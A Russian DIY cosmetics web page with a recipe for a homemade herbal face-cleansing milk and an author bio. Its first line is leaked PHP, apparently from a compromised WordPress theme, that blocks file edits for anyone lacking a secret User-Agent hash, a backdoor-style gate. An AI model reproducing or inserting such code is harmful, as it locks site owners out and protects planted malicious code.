if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Делаем молочко для лица из лечебных трав своими руками | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Делаем молочко для лица из лечебных трав своими руками

Бесплатная косметика – это не миф. Очищающее молочко для лица, приготовленное домашних условиях, подарит вам ощущение нежности и чистоты

Очи­ща­ю­щее молоч­ко для лица, при­го­тов­лен­ное домаш­них усло­ви­ях, пода­рит вам ощу­ще­ние неж­но­сти и чистоты.

Для изготовления такого молочка вам понадобиться:

  • сбор лечеб­ных трав (зве­робой, чисто­тел, тыся­че­лист­ник, кра­пи­ва и ромашка);
  • све­жее моло­ко (1 сто­ло­вая ложка);
  • мед (1 чай­ная ложка)

Изготовление

Бес­плат­ная кос­ме­ти­ка – это не миф. Сей­час из при­го­тов­лен­ных ингре­ди­ен­тов вы смо­же­те само­сто­я­тель­но изго­то­вить каче­ствен­ное очи­ща­ю­щее сред­ство для лица. Сбор лечеб­ных трав необ­хо­ди­мо залить 1стаканом кипят­ка и накрыть крыш­кой. В тече­ние 20 минут они долж­ны натаиваться.

Затем жид­кость необ­хо­ди­мо про­це­дить и охла­дить. После это­го мож­но сме­шать 3 ст.л. целеб­но­го настоя из рас­те­ний с моло­ком. К полу­чен­ной сме­си добав­ля­ют мед и тща­тель­но все раз­ме­ши­ва­ют. Мед дол­жен обя­за­тель­но рас­тво­рит­ся. Недо­пу­сти­мо при­сут­ствие комоч­ков или частиц трав. Ведь это может повре­дить коже.

Применение

На ват­ный диск необ­хо­ди­мо нане­сти неболь­шое коли­че­ство при­го­тов­лен­но­го молоч­ка и лег­ким дви­же­ни­ем очи­стить кожу лица. Это сред­ство мож­но исполь­зо­вать ежедневно.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Мыльная принцесса

С детства люблю все делать своими руками и вот мыловарение - одно из хобби, которое затянуло. Решила сделать портал mylce.ru, которое поможет вам - новичкам и профессионалам сделать классное натуральное мыло своими руками! Найти меня можно здесь: Website | Facebook | Twitter | Читайте все мои записи!